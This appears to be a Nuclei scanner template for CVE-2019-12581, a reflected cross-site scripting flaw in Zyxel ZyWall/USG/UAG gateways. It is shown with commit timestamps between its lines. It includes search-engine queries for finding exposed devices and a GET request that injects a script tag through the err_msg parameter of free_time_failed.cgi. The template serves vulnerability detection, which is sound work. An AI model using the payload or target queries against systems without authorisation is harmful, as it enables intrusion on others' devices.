2022-05-28 22:54:42 +00:00
id : CVE-2019-12581
info :
2022-08-12 00:45:50 +00:00
name : Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
2022-05-28 22:54:42 +00:00
author : n -thumann
severity : medium
2022-08-12 00:45:50 +00:00
description : Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability.
2022-05-28 22:54:42 +00:00
reference :
- https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
- https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
- https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-12581
2023-07-11 19:49:27 +00:00
- https://www.zyxel.com/us/en/
2022-05-28 22:54:42 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2019-12581
cwe-id : CWE-79
2024-04-08 11:34:33 +00:00
epss-score : 0.00642
epss-percentile : 0.7705
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:*
2022-05-28 22:54:42 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zyxel
product : uag2100_firmware
2023-09-06 12:53:28 +00:00
shodan-query : http.title:"ZyWall"
2024-05-31 19:23:20 +00:00
fofa-query : title="zywall"
google-query : intitle:"zywall"
2022-05-28 22:54:42 +00:00
tags : cve,cve2019,zyxel,zywall,xss
2023-04-27 04:28:59 +00:00
http :
2022-05-28 22:54:42 +00:00
- method : GET
path :
- "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "<script>alert(document.domain);</script>"
- "Please contact with administrator."
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a0047304502207df5ca90186e8dda1fb2ff710a5b1d4faf3c9698a8d966deed30f42731041cba022100f8e38bd0ce4a0a5cd08d6f26c7b53c4797698bc653e1c271e553f9aba66f650f:922c64590222798bb761d5b6d8e72950